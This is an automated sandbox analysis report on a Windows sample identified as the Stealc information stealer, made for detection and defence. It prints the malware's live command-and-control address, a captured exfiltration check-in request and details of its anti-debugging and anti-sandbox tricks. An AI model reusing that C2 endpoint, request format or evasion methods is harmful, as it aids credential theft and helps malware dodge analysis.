
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528224
MD5: c1a82a310c9dc31947dfae1e6136dc46
SHA1: a9868cf5ede614df7911b1e62b5d20a04fc4c259
SHA256: 35ce1834e64cfffdd4729c0254790e7aca014b3013733ccf872907d8d04e2b2b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C1A82A310C9DC31947DFAE1E6136DC46)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6636 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6636 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.610000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alert:
Timestamp: 2024-10-07T17:08:19.270990+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source: 192.168.2.4:49730 | Destination: 185.215.113.37:80 | Protocol: TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.610000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0061C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00617240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00617240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00619AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00619AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00619B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00619B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00628EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00628EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_006238B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00624910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00624910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0061DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0061E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00624570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00624570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0061ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0061BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0061DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_006116D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00623EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00623EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0061F6B0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 36 39 44 30 35 37 38 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a
    Data Ascii:
    ------AAEGHJKJKKJDHIDHJKJD
    Content-Disposition: form-data; name="hwid"

    94369D0578E64120021454
    ------AAEGHJKJKKJDHIDHJKJD
    Content-Disposition: form-data; name="build"

    doma
    ------AAEGHJKJKKJDHIDHJKJD--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00614880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00614880
Source: file.exe, 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/9
Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/U
Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1876333554.0000000001166000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1876333554.0000000001145000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJD
Source: file.exe, 00000000.00000002.1876333554.0000000001157000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpObL

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 | 0_2_009CD092
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091014B | 0_2_0091014B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C0A82 | 0_2_009C0A82
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BDAAB | 0_2_009BDAAB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C9A3A | 0_2_009C9A3A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EF31C | 0_2_008EF31C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CEB0F | 0_2_009CEB0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A6328 | 0_2_008A6328
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D04B4 | 0_2_009D04B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D55C3 | 0_2_009D55C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CB578 | 0_2_009CB578
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094DEB8 | 0_2_0094DEB8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F0FEF | 0_2_008F0FEF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D1F2E | 0_2_009D1F2E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006145C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xchtnbzm ZLIB complexity 0.9942755126953124
Source: file.exe, 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00629600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00623720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00623720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NZUVIS6P.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1794560 > 1048576
Source: file.exe | Static PE information: Raw size of xchtnbzm is bigger than: 0x100000 < 0x190000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.610000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xchtnbzm:EW;hubelpjq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xchtnbzm:EW;hubelpjq:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00629860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00629860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c534f should be: 0x1c0df6
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: xchtnbzm
Source: file.exe | Static PE information: section name: hubelpjq
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A438A4 push 4CB5EC42h; mov dword ptr [esp], edx | 0_2_00A438CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A438A4 push ecx; mov dword ptr [esp], 653A3DE7h | 0_2_00A4390A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 6C494A40h; mov dword ptr [esp], esi | 0_2_009CD0B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 338725C1h; mov dword ptr [esp], edi | 0_2_009CD104
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push esi; mov dword ptr [esp], edx | 0_2_009CD20F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push edx; mov dword ptr [esp], esi | 0_2_009CD30E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 1B9FFBA0h; mov dword ptr [esp], ebx | 0_2_009CD384
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push ecx; mov dword ptr [esp], 575939B2h | 0_2_009CD3D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 5C4623AFh; mov dword ptr [esp], ecx | 0_2_009CD3E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 1DB89F38h; mov dword ptr [esp], ebp | 0_2_009CD421
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push esi; mov dword ptr [esp], edx | 0_2_009CD483
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 0EB02C0Ch; mov dword ptr [esp], esi | 0_2_009CD501
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 1A28D500h; mov dword ptr [esp], eax | 0_2_009CD536
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push edx; mov dword ptr [esp], edi | 0_2_009CD565
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push edx; mov dword ptr [esp], esi | 0_2_009CD5A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push esi; mov dword ptr [esp], edx | 0_2_009CD606
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 304017E2h; mov dword ptr [esp], eax | 0_2_009CD647
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 0438F027h; mov dword ptr [esp], esi | 0_2_009CD698
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 4D5DAF59h; mov dword ptr [esp], eax | 0_2_009CD7EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push edx; mov dword ptr [esp], ecx | 0_2_009CD80D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push ebp; mov dword ptr [esp], eax | 0_2_009CD81D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push esi; mov dword ptr [esp], 7B39D1FCh | 0_2_009CD88E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push edi; mov dword ptr [esp], 0B01D83Ah | 0_2_009CD964
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 539A6890h; mov dword ptr [esp], ebp | 0_2_009CD97B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 2A61F6ECh; mov dword ptr [esp], ecx | 0_2_009CD99F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 18ED2921h; mov dword ptr [esp], ecx | 0_2_009CD9F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push ebp; mov dword ptr [esp], 1D705A70h | 0_2_009CDA5D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 0791D95Fh; mov dword ptr [esp], edx | 0_2_009CDBB8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 79586527h; mov dword ptr [esp], edi | 0_2_009CDBD1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push esi; mov dword ptr [esp], ebx | 0_2_009CDC68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CD092 push 22441FF3h; mov dword ptr [esp], edi | 0_2_009CDC8C
Source: file.exe | Static PE information: section name: xchtnbzm entropy: 7.9517025024735215

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13211
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DC986 second address: 9DC98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CE5EC second address: 9CE5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CE5F0 second address: 9CE5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9CE5FB second address: 9CE602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DB9D8 second address: 9DB9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DBCAB second address: 9DBCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DBF64 second address: 9DBF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DC2A7 second address: 9DC2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0C44D4E186h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DC2B2 second address: 9DC2DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0C44E7DD66h 0x00000009 jmp 00007F0C44E7DD78h 0x0000000e jnl 00007F0C44E7DD66h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDCC6 second address: 9DDD31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44D4E190h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F0C44D4E195h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F0C44D4E18Eh 0x00000019 pop eax 0x0000001a xor ecx, dword ptr [ebp+122D2C73h] 0x00000020 lea ebx, dword ptr [ebp+1243FAB0h] 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F0C44D4E196h 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F0C44D4E186h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDDC7 second address: 9DDDD1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0C44E7DD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDDD1 second address: 9DDDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0C44D4E186h 0x00000009 jo 00007F0C44D4E186h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F0C44D4E188h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDDEE second address: 9DDDF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDDF4 second address: 9DDE2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0C44D4E186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F0C44D4E198h 0x00000012 or dword ptr [ebp+122D1E3Fh], eax 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b stc 0x0000001c push E4A02FBFh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDE2E second address: 9DDE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDE32 second address: 9DDE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDE38 second address: 9DDEAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 1B5FD0C1h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0C44E7DD68h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000003h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0C44E7DD68h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 push 00000000h 0x00000049 mov dword ptr [ebp+122D249Ah], esi 0x0000004f push 00000003h 0x00000051 mov cx, ax 0x00000054 call 00007F0C44E7DD69h 0x00000059 jl 00007F0C44E7DD74h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDEAC second address: 9DDEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DDEB0 second address: 9DDF07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0C44E7DD97h 0x0000000d pushad 0x0000000e jmp 00007F0C44E7DD78h 0x00000013 jmp 00007F0C44E7DD77h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0C44E7DD72h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDF07 second address: 9DDF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
